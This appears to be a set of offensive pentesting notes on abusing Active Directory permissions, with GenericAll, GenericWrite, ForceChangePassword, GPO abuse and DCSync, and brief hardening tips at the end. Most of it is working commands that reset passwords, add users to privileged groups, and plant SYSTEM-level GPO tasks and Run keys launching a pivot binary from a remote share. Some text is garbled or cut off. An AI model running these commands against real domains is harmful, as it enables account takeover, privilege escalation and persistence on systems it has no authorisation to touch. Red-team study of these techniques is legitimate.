If we have some form of GenericAll on a user, we can simply reset the password of this user without knowing their current password
net user vulnerable_username youhavebeenpwned@! /domain
On Group
For Groups, we can just add our current user into the group and then be able to gain more privileges that way.
net group "Vulnerable Group" compromised_user /add /domain
# PowerSploit
Add-NetGroupUser -Username <user> -GroupName <group> -Domain <domain>
# AD Module
Add-ADGroupMember -Identity "<group"> -Members <user>
GenericAll / GenericWrite on Computer
If we have privileges over an object, we can opt to either abuse this ACL or use .
GenericWrite on User
With this, we are able to chagne the Script-Path of the logon script of the user. In short, whenever we login to Windows, there is a .bat file or something with a ton of commands in there that are executed. This can be modified, and we could gain a reverse shell everytime a user logs in, for example.
Since our compromised user is able to write the group, we can add any user we want into the group.
net group "<group name>" <user> /add /domain
ForceChangePassword
With PowerView, we can force a change of another user's password, or we can try to convert the password to a secure string and then be able to change it from there
Attackers can add whoever they want into the group.
net group "<group name>" <user> /add /domain
GPO Abuse
Suppose there are weak permissions over the domain GPOs, and we can edit them. GPOs typically have some kind of script that is consistenly running on a system, like a cronjob. We can change these to execute commands as the SYSTEM user, which normally runs GPOs as well.
These use PowerView, or the SharpGPOAbuse.exe binary.
# create new GPO task and execute immediately
New-GPOImmediateTask -TaskName task01 -Command cmd -CommandArguments "/c whoami" -GPODisplayName "Misconfigured Policy" -Verbose -Force
# create new GPO and specify new task, such as running pivot.exe
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
# using .exe to exploit this easily
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
#refreshes and reruns all scripts for GPOs, including malicious ones
gpupdate /force
DCSync Attacks
This attack would simulate the behaviour of the Domain Controller and asks the other DCs to copy information. The function for DCs to copy information from one another is critical to daily operations, and hence cannot be turned off.
Once identified, we are able to either exploit it locally or remotely:
Ensure that the privileges are not assigned, and only to users that need it
Password Complexity
Change passwords every so often, and make sure that accounts with high privileges don't have something stupid like your birthday as a password.
Update Domain Software
A little hard, but still needed. Most of the time, these privileges aren't checked and monitored too often, and some companies tend to start using the AD network out of the box. It is key to keep the system updated, as Microsoft would frequently change the default permissions on objects and policies within the domain
